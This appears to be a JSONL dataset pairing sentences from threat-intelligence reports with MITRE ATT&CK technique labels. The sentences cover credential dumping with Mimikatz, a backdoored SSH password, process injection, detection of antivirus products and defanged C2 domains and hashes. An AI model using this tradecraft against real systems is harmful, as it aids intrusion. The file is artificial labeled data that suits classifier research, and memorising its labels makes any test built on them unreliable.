{"text1":"The malware accepts up to two arguments at the command line: one to display cleartext credentials for each login session, and a second to display cleartext credentials, NTLM hashes, and malware version for each login session","labels":"['T1003']"}
{"text1":"This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets","labels":"['T1003']"}
{"text1":"Alerts for credential theft tools and privileged account lockouts should be investigated","labels":"['T1003']"}
{"text1":"(Source: Dell SecureWorks)   TG-3390 actors have also used the following publicly available tools:  Windows Credential Editor (WCE) \u2014 obtains passwords from memory gsecdump \u2014 obtains passwords from memory winrar \u2014 compresses data for exfiltration nbtscan \u2014 scans NetBIOS name servers  Tactics, techniques, and procedures Incident response engagements have given CTU researchers insight into the tactics TG-3390 employs during intrusions","labels":"['T1003']"}
{"text1":"15 Database dump Decoded, it reveals a detailed log of each affected machine","labels":"['T1003']"}
{"text1":"Mimikatz to obtain credentials.","labels":"['T1003']"}
{"text1":"It was heavily modified, with almost all original code stripped out aside from its sekurlsa::logonpasswords credential stealing feature","labels":"['T1003']"}
{"text1":"Domains The RoyalCli backdoor was attempting to communicate to the following domains:  News.memozilla[.]org video.memozilla[.]org  The BS2005 backdoor utilised the following domains for C2:  Run.linodepower[.]com Singa.linodepower[.]com log.autocount[.]org  RoyalDNS backdoor was seen communicating to the domain:  andspurs[.]com  Possible linked APT15 domains include:  Micakiz.wikaba[.]org cavanic9[.]net ridingduck[.]com zipcodeterm[.]com dnsapp[.]info   Published date:\u00a0 10 March 2018   Written by:\u00a0 Rob Smallridge","labels":"['T1008']"}
{"text1":"In order to extend the lifespan of the domains in case one or more are blacklisted, there are twelve different C2 domains that xparis() can be set to","labels":"['T1008']"}
{"text1":"Indicators of Compromise (IoCs)    C&C servers    Ssl[.]arkouthrie[.]com   s3[.]hiahornber[.]com   widget[.]shoreoa[.]com       SHA256   Delivery document (W2KM_OCEANLOTUS.A): 2bb855dc5d845eb5f2466d7186f150c172da737bfd9c7f6bc1804e0b8d20f22a   Dropper (OSX_OCEANLOTUS.D): 4da8365241c6b028a13b82d852c4f0155eb3d902782c6a538ac007a44a7d61b4   Backdoor (OSX_OCEANLOTUS.D): 673ee7a57ba3c5a2384aeb17a66058e59f0a4d0cddc4f01fe32f369f6a845c8f   The post New MacOS Backdoor Linked to OceanLotus Found appeared first on","labels":"['T1008']"}
{"text1":"Additionally malware reports itself to its hardcoded command and control servers and established a backdoor connection, so the attacker may have a permanent remote connection","labels":"['T1008']"}
{"text1":"Business and government personnel who are traveling, especially in a foreign country, often rely on systems to conduct business other than those at their home office, and may be unfamiliar with threats posed while abroad","labels":"['T1083']"}
{"text1":"These files are downloaded to a directory (C:\\Users\\Public\\Libraries\\tempsys) on the infected machine by Bxaki() and xparis()","labels":"['T1083']"}
{"text1":"In this particular case in 2013, the config file included an unknown plugin set, aside from the usual \u2018ddos\u2019 plugin listing","labels":"['T1083']"}
{"text1":"The malware then appends a script extension (php, bml, or cgi) with a random number of random parameters or a file extension from the following list with no parameters: gif, jpg, png, htm, html, php","labels":"['T1083']"}
{"text1":"The body of the POST request may contain files contained in the cabinet format","labels":"['T1083']"}
{"text1":"Figure 3 \u2013 A list of file extensions targeted for destruction by new variant of KillDisk component As well as being able to delete system files to make the system unbootable \u2013 functionality typical for such destructive trojans \u2013 the KillDisk variant detected in the electricity distribution companies also appears to contain some additional functionality specifically intended to sabotage industrial systems","labels":"['T1083']"}
{"text1":"This is the only instance we observed where a hardcoded Google Drive URL was included in RogueRobin, which may suggest that the author may have overlooked this during testing","labels":"['T1083']"}
{"text1":"HD Creates a file in the Temp path and names it \u201chd\u201d + PCID then invokes another program module named hd.test1 to identify logical drives","labels":"['T1083']"}
{"text1":"Implant directory contained in the malicious Flash file","labels":"['T1083']"}
{"text1":"Otherwise, it runs a search for the \u201c\/bin\/rsyncd\u201d string within the files found in the \/etc\/ folder","labels":"['T1083']"}
{"text1":"watch\/?   search\/?  find\/?    results\/? open\/?    search\/?  close\/?   The \u201cai\u201d value stands for the payload title","labels":"['T1083']"}
{"text1":"The file names may vary from one version of the malware to another","labels":"['T1083']"}
{"text1":"In one version of the malware, the code checks if the \u201cProgramData\u201d folder has folders or files with the keywords \u201cKasper\u201c, \u201cPanda\u201c, or \u201cESET\u201c","labels":"['T1083']"}
{"text1":"It mimics the icon Finder usually applies to JPEG or text files to increase the likelihood the recipient will double-click the file","labels":"['T1083']"}
{"text1":"The file appears to have been compiled using a bat2exe tool, which will take batch files (.bat) and convert them to PE (.exe) files","labels":"['T1083']"}
{"text1":"Unlike a previously reported variant, this version of BADNEWS no longer looks at USB drives for interesting files","labels":"['T1083']"}
{"text1":"4 Upload edg499.dat, which includes the list of interesting files","labels":"['T1083']"}
{"text1":"Since it is a very long term group, some victims may be impossible to identify now","labels":"['T1083']"}
{"text1":"PHOTO: a DLL backdoor also reported publicly as \u201cDerusbi\u201d, capable of obtaining directory, file, and drive listing; creating a reverse shell; performing screen captures; recording video and audio; listing, terminating, and creating processes; enumerating, starting, and deleting registry keys and values; logging keystrokes, returning usernames and passwords from protected storage; and renaming, deleting, copying, moving, reading, and writing to files","labels":"['T1083']"}
{"text1":"This allows the shell to upload and download files, execute applications with web server account permissions, list directory contents, access Active Directory, access databases, and any other action allowed by the .NET runtime","labels":"['T1083']"}
{"text1":"With the exception of the \u2018Speed\u2019 method previously mentioned, the names of the methods called in this chain appear to be fairly random, as seen in the following list: \u00a0  ETransaksi.Speed ETransaksi.diomadnfagaghagh ETransaksi.fjcsERIfjfiojsGHIsdifjksi ETransaksi.gsgjIDJIGJIGJIGJIFDOSpl ETransaksi.FJaioefgkaoeK  \u00a0 The last two methods in the chain carry out a majority of the first payload\u2019s functionality","labels":"['T1083']"}
{"text1":"Hashes For a list of all hashes of malware encountered during this campaign, please refer to the following file","labels":"['T1083']"}
{"text1":"17-3 Function names To target specific victims, Astaroth is locale aware; any attempts to run the malware without locale spoofing will result in failed downloads and the inability to run the .dll files","labels":"['T1083']"}
{"text1":"119 readFiles Obtains file information on a file or a folder, and supports a \u201c*\u201d wildcard and recursive file list","labels":"['T1083']"}
{"text1":"Get Directory Information The malware gets information for the provided directory address using the following WINAPI calls:","labels":"['T1083']"}
{"text1":"dir c:\\","labels":"['T1083']"}
{"text1":"2, 2018, we published a blog detailing the use of\u00a0an Adobe Flash zero-day vulnerability\u00a0(CVE-2018-4878) by a suspected North Korean cyber espionage group that we now track as APT37 (Reaper)","labels":"['T1203']"}
{"text1":"Observed vulnerabilities include:  CVE-2012-0158  CVE-2017-0199  CVE-2017-8759  CVE-2017-11882       Figure 2: APT40 attack lifecycle  Establish Foothold APT40 uses a variety of malware and tools to establish a foothold, many of which are either publicly available or used by other threat groups","labels":"['T1203']"}
{"text1":"On October 10, 2017, Kaspersky Lab\u2019s advanced exploit prevention systems identified a new Adobe Flash zero day exploit used in the wild against our customers","labels":"['T1203']"}
{"text1":"We are also highly confident that BlackOasis was also responsible for another zero day exploit (CVE-2017-8759) discovered by FireEye in September 2017.\u00a0 The FinSpy payload used in the current attacks (CVE-2017-11292) shares the same command and control (C2) server as the payload used with CVE-2017-8759 uncovered by FireEye","labels":"['T1203']"}
{"text1":"What does it mean for everyone and how to defend against such attacks, including zero-day exploits? For CVE-2017-11292 and other similar vulnerabilities, one can use the killbit for Flash within their organizations to disable it in any applications that respect it.\u00a0 Unfortunately, doing this system-wide is not easily done, as Flash objects can be loaded in applications that potentially do not follow the killbit","labels":"['T1203']"}
{"text1":"This document exploited a newer vulnerability, CVE-2017-0199","labels":"['T1203']"}
{"text1":"This change is because Group 123 did not target South Korea during this campaign and Microsoft Office is standard in the rest of the world.Infection VectorsThe attackers exploited CVE-2017-0199 in order to download and execute a malicious HTA document inside of Microsoft Office","labels":"['T1203']"}
{"text1":"Even when we observed LuckyMouse using weaponized documents with CVE-2017-11882 (Microsoft Office Equation Editor, widely used by Chinese-speaking actors since December 2017), we can\u00b4t prove they were related to this particular attack","labels":"['T1203']"}
{"text1":"This time, weaponized lure documents claiming to contain seminar information on environmental protection were observed exploiting known Microsoft Office vulnerabilities CVE-2017-0199 and CVE-2017-11882 to drop and execute the backdoor binary on the victim\u2019s machine","labels":"['T1203']"}
{"text1":"In this campaign, we observed threat actors exploiting CVE-2017-0199 and CVE-2017-11882 to distribute malware","labels":"['T1203']"}
{"text1":"Conclusion CVE-2017-0199 and CVE-2017-11882 are two of the more commonly exploited vulnerabilities that we are currently seeing","labels":"['T1203']"}
{"text1":"Figure 3: Embedded URL in OLE object CVE-2017-11882 Similarly, we have also observed actors leveraging another recently\u00a0discovered vulnerability (CVE-2017-11882) in Microsoft Office","labels":"['T1203']"}
{"text1":"In many cases, additional stealers, RATs, and other malware were observed being hosted on the same web servers.Analysis of HawkEye Reborn The campaign starts with sending the aforementioned Excel sheets that exploit the well-known CVE-2017-11882 vulnerability, an arbitrary code execution bug in Microsoft Office","labels":"['T1203']"}
{"text1":"Less than a week after Microsoft issued a patch for CVE-2017-11882 on Nov","labels":"['T1203']"}
{"text1":"14, 2017, FireEye observed an attacker using an exploit for the Microsoft Office vulnerability to target a government organization in the Middle East","labels":"['T1203']"}
{"text1":"In this latest campaign, APT34 leveraged the recent Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER","labels":"['T1203']"}
{"text1":"CVE-2017-11882: Microsoft Office Stack Memory Corruption Vulnerability CVE-2017-11882 affects several versions of Microsoft Office and, when exploited, allows a remote user to run arbitrary code in the context of the current user as a result of improperly handling objects in memory","labels":"['T1203']"}
{"text1":"Figure 3: CVE-2017-11882 and POWRUNER attack sequence  The malicious .rtf file exploits CVE-2017-11882","labels":"['T1203']"}
{"text1":"An RTF, an MSI file, a .NET Wrapper and two stages of Shellcode walk into a bar\u2026 Our journey begins with an RTF file named \u201cNew Salary Structure 2017.doc\u201d, which exploits CVE-2017-0199","labels":"['T1203']"}
{"text1":"Older documents used by Patchwork focused on the CVE-2017-0261 vulnerability, however in late January 2018 when, paradoxically, newer documents abandoned this vulnerability to attack the older CVE-2015-2545 vulnerability","labels":"['T1203']"}
{"text1":"Try to exploit the following Remote Code Execution vulnerabilities in the targeted servers:  a) CVE-2012-0874: JBoss Enterprise Application Platform Multiple Security Bypass Vulnerabilities b) CVE-2010-1871: JBoss Seam Framework remote code execution c) JBoss AS 3\/4\/5\/6: Remote Command Execution (exploit) d) CVE-2017-10271: Oracle WebLogic wls-wsat Component Deserialization RCE e) CVE-2018-2894: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware","labels":"['T1203']"}
{"text1":"We believe the adversary exploited a recently vulnerability in Microsoft SharePoint tracked by , which is a remote code execution vulnerability used to compromise the server and eventually install a webshell","labels":"['T1203']"}
{"text1":"Exploited Vulnerabilities: Frequent exploitation of vulnerabilities in Hangul Word Processor (HWP), as well as Adobe Flash","labels":"['T1068']"}
{"text1":"APT40 leverages exploits in their phishing operations, often weaponizing vulnerabilities within days of their disclosure","labels":"['T1068']"}
{"text1":"Exploitation of this vulnerability allows an attacker to escalate privileges on the affected system","labels":"['T1068']"}
{"text1":"All zero-day exploits known, or suspected, to have been used by this group are for vulnerabilities in Internet Explorer and Flash","labels":"['T1068']"}
{"text1":"APT32 regularly used stealthy techniques to blend in with legitimate user activity:  During one investigation, APT32 was observed using a privilege escalation exploit (CVE-2016-7255) masquerading as a Windows hotfix","labels":"['T1068']"}
{"text1":"Documents with the Flash exploit managed to evade static defenses and remain undetected as an exploit on VirusTotal","labels":"['T1068']"}
{"text1":"McAfee detects these threats as:  RDN\/Generic Exploit RDN\/Generic.dx Generic PWS.y Generic.hbg Exploit-CVE2018-4878  McAfee customers are also covered by McAfee Global Threat Intelligence Web Reputation classification, which rate these URLs as High Risk","labels":"['T1068']"}
{"text1":"The database is located in the \u201c\/usr\/lib\/cva-ssys\/My_BD\u201d folder (\u201c~\/.local\/cva-ssys\/My_BD\u201d\u2014if the Trojan does not have root privileges)","labels":"['T1068']"}
{"text1":"CVE-2014-4113 is a privilege escalation vulnerability that was\u00a0disclosed publicly on 2014-10-14","labels":"['T1068']"}
{"text1":"The first dropped file, doc.exe, contains the CVE-2014-4113 exploit and then attempts to execute test.exe with the elevated privileges","labels":"['T1068']"}
{"text1":"Are the attackers using any zero-day vulnerabilities? No zero-day vulnerabilities have been found in the analysis of the samples obtained regarding this campaign","labels":"['T1068']"}
{"text1":"OfficeScan\u2019s Vulnerability Protection shields endpoints from identified and unknown vulnerability exploits even before patches are even deployed.\u00a0Trend Micro\u2122\u00a0Deep Discovery\u2122 provides detection, in-depth analysis, and proactive response to attacks using exploits and other similar threats through specialized engines, custom\u00a0sandboxing, and seamless correlation across the entire attack lifecycle, allowing it to detect these attacks even without any engine or pattern update","labels":"['T1068']"}
{"text1":"Dubbed \u2018SpeakUp\u2019, the new Trojan exploits known vulnerabilities in six different Linux distributions","labels":"['T1068']"}
{"text1":"Among them, we found variations on the    EternalDarkness SMBv3 exploit (CVE-2020-0796)  , a , the privilege escalation exploit published on the Google Security Github account, and the privilege escalation exploit.","labels":"['T1068']"}
{"text1":"A 2016 Novetta report detailed the work of security vendors attempting to unveil tools and infrastructure related to the 2014 destructive attack against Sony Pictures Entertainment","labels":"['T1518.001']"}
{"text1":"The analysis of the tools and techniques used in the Astaroth campaign show how truly effective LOLbins are at evading antivirus products","labels":"['T1518.001']"}
{"text1":"Tools CTU researchers observed BRONZE UNION using the following tools in intrusions since the 2015 analysis, but clients should assume that the threat group still has access to the previously reported tools","labels":"['T1518.001']"}
{"text1":"In doing so, it will attempt to detect the following Anti-Virus products via various techniques:  Trend Micro Kaspersky Symantec Avira AVG ALYac Ahnlab  Ahnlab and ALYac are the most widely used Anti-Virus solutions in South Korea, and Trend Micro and the rest are also known to be most widely used in Taiwan","labels":"['T1518.001']"}
{"text1":"When combined with email tracking software, APT32 was able to closely track phishing delivery, success rate, and conduct further analysis about victim organizations while monitoring the interest of security firms","labels":"['T1518.001']"}
{"text1":"APT12 closely monitors online media related to its tools and operations and reacts when its tools are publicly disclosed","labels":"['T1518.001']"}
{"text1":"Types of attacks possibly averted include Structured Query Language (SQL) injection, cross-site scripting, and command injection.Use stringent file reputation settings \u2013 Tune the file reputation systems of your anti-virus software to the most aggressive setting possible","labels":"['T1518.001']"}
{"text1":"We would like to thank White-Hat, Tom Lancaster\u00a0of Palo Alto Networks, Michael Yip of Stroz Friedberg, security researcher Marcus, and other security researchers and organizations who shared information and provided feedback","labels":"['T1518.001']"}
{"text1":"In addition to obfuscation techniques, it also has the ability to detect security tools on the analysis machine, and can also shut down the system if it detects the presence of such tools","labels":"['T1518.001']"}
{"text1":"Figure 14: System shut down upon discovery of security tools  Ability to receive PowerShell script from the C2 server and execute on the machine","labels":"['T1518.001']"}
{"text1":"Additionally it checks to determine if common analysis tools are currently running on the infected system","labels":"['T1518.001']"}
{"text1":"Given the regional file format used there is a chance that some security software suites may not handle them well, and this may have provided an evasion case for the attacker.The documents sent to the targets were titled \"Analysis of \"Northern New Year in 2017\" and used the official logo of the Korean Ministry of Unification","labels":"['T1518.001']"}
{"text1":"Smart, optimized, and connected, XGen security powers Trend Micro\u2019s suite of security solutions: Hybrid Cloud Security, User Protection, and Network Defense","labels":"['T1518.001']"}
{"text1":"Link analysis of infrastructure and tools also revealed a potential relationship between Magic Hound and the adversary group called \u201cRocket Kitten\u201d (AKA Operation Saffron Rose, Ajax Security Team, Operation Woolen-Goldfish) as well as an older attack campaign called Newscasters","labels":"['T1518.001']"}
{"text1":"As seen below, the relational analysis proved to be quite fruitful:  Figure 1 Overview of relationships We rapidly discovered a different set of tools communicating to the exact same C2 servers as those two Word documents, in addition to other tools communicating to other subdomain variations of chrome-up[.]date as seen in the following graphic:  Figure 2 Command and control overlaps From there, we were able to map out a large infrastructure separating out into four categories of tools: downloaders, droppers, loaders, and payloads","labels":"['T1518.001']"}
{"text1":"The toolset used by the Magic Hound campaign was an assortment of custom tools, as well as open sourced tools available to the general public","labels":"['T1518.001']"}
{"text1":"They are known for \u201cliving off the land,\u201d meaning they use already available tools and software installed on the computer to operate, and once inside a target network, they will tailor their malware specifically to the target","labels":"['T1518.001']"}
{"text1":"Traditional antivirus software and other systems that rely on low-level indicators do not effectively detect and block common and pervasive malware","labels":"['T1518.001']"}
{"text1":"End users can benefit from security solutions such as\u00a0Trend Micro Home Security for Mac, which provides comprehensive security and multi-device protection against cyberthreats","labels":"['T1518.001']"}
{"text1":"As we discover new tools used by this group, we have consistently discovered overlapping artifacts with previously used tools and infrastructure","labels":"['T1518.001']"}
{"text1":"Mitigation Security and system\/IT administrators must practice due diligence in protecting their websites and web-based applications from threats that can undermine their security, and hijack them to do the bad guys\u2019 bidding\u2014delivering malware to their victims","labels":"['T1518.001']"}
{"text1":"Network Security appliances such as NGFW, NGIPS, and Meraki MX can detect malicious activity associated with this threat","labels":"['T1518.001']"}
{"text1":"AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products","labels":"['T1518.001']"}
{"text1":"Mitigation As this sample installs itself through the use of EternalBlue, the targeted protocol is SMB.\u00a0 Because of this, in order to best mitigate and avoid possible installations, you need your system updated to the latest security patches.\u00a0 Specifically, you\u2019d want to make sure that you have MS17-010 installed, as this is the security patch that patches the EternalBlue vulnerability","labels":"['T1518.001']"}
{"text1":"The malware queries the value for the flag BeingDebugged from PEB to check whether the process is being debugged.","labels":"['T1518.001']"}
{"text1":"The RIPTIDE exploit document drops its executable file into the C:\\Documents and Settings\\{user}\\Application Data\\Location folder while the HIGHTIDE exploit document drops its executable file into the C:\\DOCUMENTS and SETTINGS\\{user}\\LOCAL SETTINGS\\Temp\\ folder","labels":"['T1005']"}
{"text1":"In many payment card data breaches, a point-of-sale (POS) system is infected with malware that searches for specific processes in memory known to store card data in plain text","labels":"['T1005']"}
{"text1":"Additionally, VALUEVAULT will call Windows PowerShell to extract browser history in order to match browser passwords with visited sites.","labels":"['T1005']"}
{"text1":"Custom tools such as REDTRIP, PINKTRIP, and BLUETRIP have also been used to create SOCKS5 proxies between infected hosts","labels":"['T1090']"}
{"text1":"In green, functions from Keychaindump C&C communication Keydnap is using the onion.to Tor2Web proxy over HTTPS to report back to its C&C server","labels":"['T1090']"}
{"text1":"This can be complemented by restricting direct internet access to the company\u2019s internal networks while using proxies to access external resources","labels":"['T1090']"}
{"text1":"Lateral Movement APT40 uses many methods for lateral movement throughout an environment, including custom scripts, web shells, a variety of tunnelers, as well as Remote Desktop Protocol (RDP)","labels":"['T1021.001']"}
{"text1":"Containment provided by enclaving also makes incident cleanup significantly less costly.Configure firewalls to disallow Remote Desktop Protocol (RDP) traffic coming from outside of the network boundary, except for in specific configurations such as when tunneled through a secondary virtual private network (VPN) with lower privileges.Audit existing firewall rules and close all ports that are not explicitly needed for business","labels":"['T1021.001']"}
{"text1":"FIN6 used another set of compromised credentials with membership to additional groups in the domain to RDP to other hosts","labels":"['T1021.001']"}
{"text1":"To complete its mission, APT39 typically archives stolen data with compression tools such as WinRAR or 7-Zip","labels":"['T1560']"}
{"text1":"This crafted zip archive exploited a WinRAR flaw that makes files in zip archives appear to have a different name and file extension","labels":"['T1560']"}
{"text1":"On September 24, 2018, we observed an organization targeted by OilRig attempting to download a Zip archive from the following URL: hxxp:\/\/193.111.152[.]13\/[redacted]-ITsoftwareUpdate.zip This Zip archive contained a file named [redacted]-ITsoftwareUpdate.exe (SHA256: 5f42deb792d8d6f347c58ddbf634a673b3e870ed9977fdd88760e38088cd7336), which is a variant of the OopsIE Trojan we described in detail in a blog we published in September 2018","labels":"['T1560']"}
{"text1":"RARM Creates RAR files per logical drive containing data with timestamps for the past 30 days, then uploads RAR to the C2 server using a POST command at the path \u201c\/FeedBack.php\u201d","labels":"['T1560']"}
{"text1":"RARW Creates RAR files per logical drive containing data with timestamps for the past 7 days, then uploads RAR to the C2 server using a POST command at the path \u201c\/FeedBack.php\u201d","labels":"['T1560']"}
{"text1":"When exfiltrating the keychain, the keychain field is used instead of data","labels":"['T1560']"}
{"text1":"Sometimes it is a high profile, legitimate site such as \u201cdiplomacy.pl\u201d, hosting a ZIP archive","labels":"['T1560']"}
{"text1":"The ZIP archive contains a RAR SFX which installs the malware and shows an empty PDF decoy","labels":"['T1560']"}
{"text1":"The entire command structure gets compressed with zlib and then encrypted using a custom stream cipher.","labels":"['T1560']"}
{"text1":"Internal Reconnaissance APT40 uses compromised credentials to log on to other connected systems and conduct reconnaissance","labels":"['T1021']"}
{"text1":"Figure 4 \u2013 Backdoored authentication function in SSH server As you can see in Figure 4, this version of Dropbear SSH will authenticate the user if the password passDs5Bu9Te7 was entered","labels":"['T1021']"}
{"text1":"APT40 also uses publicly available brute-forcing tools and a custom utility called DISHCLOTH to attack different protocols and services","labels":"['T1110']"}
{"text1":"During our initial research into the TwoFace++ loader, we were unable to extract the embedded payload using the same brute forcing technique that we used on the initial TwoFace loader samples","labels":"['T1110']"}
{"text1":"We were able to brute force the actor-provided key using the inverse arithmetic operations using the embedded salt and embedded ciphertext, so we were able to extract the embedded webshells with ease","labels":"['T1110']"}
{"text1":"It then takes note of the infected machine\u2019s IP address, user, domain, hostname, OS and Service Pack, and the username and password combination that worked during the brute force routine","labels":"['T1110']"}
{"text1":"Its main functions are:  Brute-force using a pre-defined list of usernames and passwords in an attempt to login to Admin panels","labels":"['T1110']"}
{"text1":"Several of the tools are freely-available Windows utilities, such as Amplia Security\u2019s Windows Credential Editor. We also found a nearly complete set of the Microsoft SysInternals  PsTools package, a copy of NLBrute (which attempts to brute-force passwords), installers for the commercial TeamViewer and AnyDesk remote support tools, and a number of utilities created by endpoint security vendors that are designed to remove their (and other companies\u2019) endpoint security and antivirus tools from a computer.","labels":"['T1110']"}
{"text1":"We found a brute-force tool called NLBrute , with configuration files that tell us it had been set up to use an included set of username and passwords to try to break in to machines that have Remote Desktop enabled","labels":"['T1110']"}
{"text1":"Common TCP ports 80 and 443 are used to blend in with routine network traffic","labels":"['T1571', 'T1043']"}
{"text1":"Resulting script on the compromised government websites Users were redirected to https:\/\/google-updata[.]tk:443\/hook.js, a BEeF instance, and https:\/\/windows-updata[.]tk:443\/scanv1.8\/i\/?1, an empty ScanBox instance that answered a small piece of JavaScript code","labels":"['T1571', 'T1043']"}
{"text1":"PUPY LOADER The Pupy RAT comes packaged by default with loaders that can run the RAT on a variety of platforms such as Windows, macOS, Linux and Android","labels":"['T1571', 'T1043']"}
{"text1":"In addition, although the 2017 campaign has been documented, during our research regarding MirageFox, we found a recently uploaded binary (6\/8\/2018) from the 2017 campaign, pretty much identical to a RAT mentioned in their RoyalAPT report, barely detected with only 7\/66 detections on VirusTotal.\u00a0 APT15 Code Reuse We found the new version of the RAT on VirusTotal hunting, by a YARA signature we created based off code only found in Mirage and Reaver, both attributed to Chinese government affiliated groups","labels":"['T1571', 'T1043']"}
{"text1":"These files are then transmitted to a threat actor, often over commonly open ports 80 and 443 (HTTP and HTTPS)","labels":"['T1571', 'T1043']"}
{"text1":"KONNI is a RAT that is believed to have \u00a0been in use for over four years, with a wide array of functionalities, often leveraging free web hosting providers like 000webhost for its C2 infrastructure","labels":"['T1571', 'T1043']"}
{"text1":"Command and control To traverse the firewall, C2 traffic for most TG-3390 tools occurs over ports 53, 80, and 443","labels":"['T1571', 'T1043']"}
{"text1":"Upon first execution of TONEDEAF, FireEye identified a callback to the C2 server offlineearthquake[.]com over port 80.","labels":"['T1571', 'T1043']"}
{"text1":"The Metasploit reverse HTTP payload was configured to communicate with the command and control (C2) IP address 176.126.85[.]207 with a randomly named resource such as\u201d over TCP port 443.","labels":"['T1571', 'T1043']"}
{"text1":"The malware proceeds to connect to the C2 server at 5.189.145.248 at regular intervals through the use of TCP over port 10500","labels":"['T1571']"}
{"text1":"1\/12\/14 3\/5\/14 127.0.0.1 N\/A   3\/5\/14 3\/31\/14 103.24.0.142 Hong Kong   3\/31\/14 10\/27\/14 103.24.1.54 Hong Kong   10\/27\/14 11\/9\/14 127.0.0.1 N\/A   11\/9\/14 5\/25\/15 127.0.0.3 N\/A   5\/25\/15 Current as of this publication 127.0.0.1 N\/A    Table 5","labels":"['T1571']"}
{"text1":"Figure 5 shows Phishery\u2019s output to the command that injects a URL into a file named \u201cgood_test.docx\u201d, which it will save the resulting file to \u201cbad_test.docx\u201d","labels":"['T1055']"}
{"text1":"It is capable of the following functions:  Collect file\/folder\/drive information Download files and additional malware Launch\/terminate\/enumerate process Update configuration data Delete files Inject code from files to other running process Utilize proxy Open reverse shell Run in passive mode \u2014 instead of actively connecting to the command and control (C&C) server, the backdoor will open and listen to a port then receive commands through it  Once the backdoor is loaded, it will then load the encrypted configuration file Auditcred.dll.mui\/rOptimizer.dll.mui to extract the C&C information and connect to it","labels":"['T1055']"}
{"text1":"As a result of all these steps, the last-stage Trojan is injected into svchost.exe\u2019s process memory","labels":"['T1055']"}
{"text1":"Process injection helps the malware avoid detection; however, review of active network connections show notepad.exe communicating to 185","labels":"['T1055']"}
{"text1":"This shellcode injects the final payload taken from the resource section into the original RegAsm.exe process","labels":"['T1055']"}
{"text1":"Traps\u00a04.0 can be configured to protect the processes that are cited as being abused in this blog from loading malicious code","labels":"['T1055']"}
{"text1":"05 27 28 obj32.bin obj32.bin obj64.bin Shellcode template is used by Reinstaller\/Injector (rsXX.dll) and AudioRecorder4MetroApp (meXX.dll) for injecting into running processes","labels":"['T1055']"}
{"text1":"Pupy can communicate using multiple transports, migrate into processes using reflective injection, and load remote python code, python packages and python C-extensions from memory","labels":"['T1055']"}
{"text1":"Meanwhile, injection and delivery techniques are undergoing changes in 2018 with reflective loaders and code enhancements","labels":"['T1055']"}
{"text1":"2e0361fd73f60c76c69806205307ccac, update.dll (MiniDuke), 425kb (internal name = \u201cUserCache.dll\u201c) 9e3f3b5e9ece79102d257e8cf982e09e, cache.dll (CozyDuke), 425kb (internal name = \u201cUserCache.dll\u201c) The two share identical export function names in their export directories, and the naming appears to be randomly assigned at compile time","labels":"['T1055']"}
{"text1":"*Command_Create&Inject:\u00a0 This command creates a new process (using a supplied filename as the process name) and then injects malicious code into it","labels":"['T1055']"}
{"text1":"64)   u= {B5B70BD7-87FC-499A-B4D1- 98163306F0D8} A GUID   r= 1 Boolean value if the malware is running as injected code   t= 8035187 Number of milliseconds the computer has been running    Table 3","labels":"['T1055']"}
{"text1":"The loader will then inject a DLL backdoor into dllhost.exe","labels":"['T1055']"}
{"text1":"TClient is injected into dllhost.exe Malware Analysis\u00a0 wab32res.dll (FakeRun loader) loads TClient","labels":"['T1055']"}
{"text1":"Successfully checking the loader will execute the dllhost.exe process and create a hardcode mutex to avoid injecting it into the wrong dllhost.exe, as there can be multiple instances of it depending on the number of programs using the Internet Information Services","labels":"['T1055']"}
{"text1":"Figure 2: De-obfuscated code scheduling the second task to run a script embedded in a blog page The last section of script embedded in 29[.]html then downloads Revenge RAT and injects the binary into the memory of a running process, as seen in Figure 3","labels":"['T1055']"}
{"text1":"It\u2019s also used to inject code into its target processes using the technique.","labels":"['T1055']"}
{"text1":"wmic.exe is a powerful, native Windows command line utility used to interact with Windows Management Instrumentation (WMI)","labels":"['T1047']"}
{"text1":"POSHSPY leverages two of the tools the group frequently uses: PowerShell and Windows Management Instrumentation (WMI)","labels":"['T1047']"}
{"text1":"Windows Management Instrumentation WMI is an administrative framework that is built into every version of Windows since 2000","labels":"['T1047']"}
{"text1":"WMI can be accessed using a variety of tools, including the Windows WMI Command-line (wmic.exe), or through APIs accessible to programming and scripting languages such as PowerShell","labels":"['T1047']"}
{"text1":"Windows system WMI data is stored in the WMI common information model (CIM) repository, which consists of several files in the System32\\wbem\\Repository directory","labels":"['T1047']"}
{"text1":"WMI classes are the primary structure within WMI","labels":"['T1047']"}
{"text1":"WMI Filters define conditions that will trigger a Consumer, including system startup, the execution of a program, the passing of a specified time and many others","labels":"['T1047']"}
{"text1":"APT29 then created a WMI event subscription in order to execute the backdoor","labels":"['T1047']"}
{"text1":"In one instance, APT29 created a Filter named BfeOnServiceStartTypeChange (Figure 1), which they configured to execute every Monday, Tuesday, Thursday, Friday, and Saturday at 11:33 am local time.\u00a0    Figure 1: \u201cBfeOnServiceStartTypeChange\u201d WMI Query Language (WQL) filter condition The BfeOnServiceStartTypeChange Filter was bound to the CommandLineEventConsumer WindowsParentalControlsMigration","labels":"['T1047']"}
{"text1":"This excellent whitepaper by William Ballenthin, Matt Graeber and Claudiu Teodorescu contains additional information on WMI offense, defense and forensics","labels":"['T1047']"}
{"text1":"This presentation by Christopher Glyer and Devon Kerr contains additional information on attacker use of WMI in past Mandiant investigations","labels":"['T1047']"}
{"text1":"The FireEye FLARE team released a WMI repository-parsing tool that allows investigators to extract embedded data from the WMI repository and identify WMI persistence.","labels":"['T1047']"}
{"text1":"The payload uses WMI queries and checks running processes for evidence that the script may be executing within an analysis environment","labels":"['T1047']"}
{"text1":"Technique Description   Fan Check The Trojan will perform the following WMI query: \u00a0 Select * from Win32_Fan \u00a0 According to MSDN, this query should return a class that provides statistics on the CPU fan","labels":"['T1047']"}
{"text1":"Leveraging Existing Windows Services to Deliver Malware Windows Management Instrumentation Console (WMIC) provides a command line interface to WMI","labels":"['T1047']"}
{"text1":"WMIC is a good tool for managing windows hosts and is widely favored by desktop administrators","labels":"['T1047']"}
{"text1":"This is attack vector presents interesting problems, as blocking or restricting the use of WMIC may not be a feasible solution for some administrators","labels":"['T1047']"}
{"text1":"This location data gives the attacker a unique edge, as they can specify a target country or city to attack and maximize their accuracy when choosing a particular target.\u00a0  \u00a0The .txt file contains information about the C2 domain and infected machine, as detected in a Cybereason Lab environment","labels":"['T1041']"}
